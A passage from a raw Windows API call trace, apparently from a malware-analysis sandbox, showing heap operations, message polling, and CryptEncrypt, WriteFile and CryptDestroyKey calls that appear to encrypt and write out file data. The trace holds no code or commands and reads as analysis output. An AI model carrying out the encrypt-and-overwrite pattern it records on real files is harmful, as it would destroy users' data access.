(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0121.790] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74550 | out: hHeap=0x2af0000) returned 1 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0121.790] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0121.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0121.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0121.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0121.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0121.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0121.790] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0121.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0121.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2a0 [0121.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0121.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0121.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0121.791] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0121.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa330 [0121.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0121.791] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0121.791] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0121.791] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0121.791] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0121.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0121.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8e130 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0121.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0121.793] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0121.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0121.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0121.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa438, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0121.794] CryptEncrypt (in: hKey=0x9a4880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x9ff1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x9ff8) returned 1 [0121.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.795] CharLowerBuffW (in: lpsz="byte[40952]", cchLength=0xb | out: lpsz="byte[40952]") returned 0xb [0121.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.796] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.796] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.796] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.796] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.796] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0121.797] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0121.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa3c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0121.797] CryptEncrypt (in: hKey=0x9a4880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a8e130*, pdwDataLen=0x8cef60*=0x9ff1, dwBufLen=0x9ff8 | out: pbData=0x2a8e130*, pdwDataLen=0x8cef60*=0x9ff8) returned 1 [0121.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.799] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.800] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.800] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0121.800] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.800] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0121.800] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.800] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.800] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0121.800] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.800] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0121.800] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.800] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.801] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0121.801] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.801] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0121.801] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.801] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0121.802] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.802] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0121.802] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.802] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0121.802] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0121.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.816] WriteFile (in: hFile=0x4f0, lpBuffer=0x2abf418*, nNumberOfBytesToWrite=0x9ff8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2abf418*, lpNumberOfBytesWritten=0x8cf5e4*=0x9ff8, lpOverlapped=0x0) returned 1 [0121.845] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.845] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.845] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0121.845] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0121.846] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0121.846] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0121.846] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0121.847] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.847] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0121.847] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.847] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0121.847] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0121.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0121.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa3d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0121.847] CryptDestroyKey (hKey=0x9a4880) returned 1 [0121.847] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0121.847] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0121.848] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0121.848] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0121.848] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0121.848] PeekMessageW (in: lpMsg=0x8cf140, 